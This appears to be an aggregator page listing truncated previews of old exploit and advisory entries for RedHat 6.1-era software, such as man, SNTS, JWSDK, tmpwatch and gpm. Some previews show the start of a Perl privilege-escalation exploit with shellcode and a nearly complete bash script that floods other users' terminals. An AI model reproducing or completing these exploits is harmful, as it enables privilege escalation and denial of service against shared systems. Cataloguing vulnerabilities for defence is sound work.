RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2815/info A vulnerability exists in the 'man' system manual pager program. It is possible for local users to cause man to cache files in the system cache directory from outside of the configured manual page hierarchy sear...

Atrus Trivalie Productions Simple Network Time Sync 1.0 daemon Buffer Overflow

No description provided by source. source: http://www.securityfocus.com/bid/1289/info A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it...

Redhat 6.1 man Local Exploit (egid 15)

No description provided by source. !/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - [email protected] $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"...

JWSDK *add-on

Javaserver Web Dev Kit version 1.0 JWSDK JWSDK directory traversal vulnerability is found by CHINANSL Security AdvisoryCSA-200106, i want to add another thing, it's also vulnerable to other operating system like redhat 6.1 and this nasty bug allows you to browse and read any file with ROOT...

RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation

source: https://www.securityfocus.com/bid/2815/info A vulnerability exists in the 'man' system manual pager program. It is possible for local users to cause man to cache files in the system cache directory from outside of the configured manual page hierarchy search path. Combined with the...

Redhat 6.1 man Local Exploit (egid 15)

Exploit for linux platform in category local exploits ====================================== Redhat 6.1 man Local Exploit egid 15 ====================================== !/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - email protected $shellcode =...

RedHat 6.1 - 'man' Local Overflow / Local Privilege Escalation

!/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - [email protected] $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b". "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"...

RedHat 6.1 - man Local Overflow Local Privilege Escalation

RedHat 6.1 - man Local Overflow Local Privilege Escalation !/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - [email protected] $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"...

RedHat 6.1/6.2 - TTY Flood Users

!/bin/bash by teleh0r TTYDIR=/dev/pts NONSENSE=/bin/nice MYTTY=tty To prevent flooding of one's own TTY while /bin/true ; do for i in $TTYDIR/ ; do if -w $i -a -c $i -a $i != $MYTTY ; then cat $NONSENSE $i fi done done unset i milw0rm.com 2001-01-02...

tmpwatch: local DoS : fork()bomb as root

sent through bugzilla.redhat.com no reply from responsible person. here it goes. Local DoS in /usr/sbin/tmpwatch. root forkbombs himself. tmpwatch is a bad boy Summary Local people can stop things working, and force you to reboot.  Longer summary Any user with write access to /tmp or /var/tmp ca...

Atrus Trivalie Productions Simple Network Time Sync 1.0 - daemon Buffer Overflow

source: https://www.securityfocus.com/bid/1289/info A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to...

Vulnerability in SNTS

I noticed an uncommon scanf overflow in the Simple Network Time Sync daemon and client version 1.0, tested on Redhat 6.1. I haven't looked into this fully yet, but it looks as tho it could be root comprimising as it sits on a priveledged udp port and seems to coredump, but looks like it only give...

OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service

// source: https://www.securityfocus.com/bid/1377/info gpm is a program that allows Linux users to use the mouse in virtual consoles. It communicates with a device, /dev/gpmctl, via unix domain STREAM sockets and is vulnerable to a locally exploitable denial of service attack. If a malicious user...

OpenLinux 2.32.4 RedHat 6.06.1 SCO eServer 2.3 - Denial of Service

OpenLinux 2.32.4 RedHat 6.06.1 SCO eServer 2.3 - Denial of Service // source: https://www.securityfocus.com/bid/1377/info gpm is a program that allows Linux users to use the mouse in virtual consoles. It communicates with a device, /dev/gpmctl, via unix domain STREAM sockets and is vulnerable to ...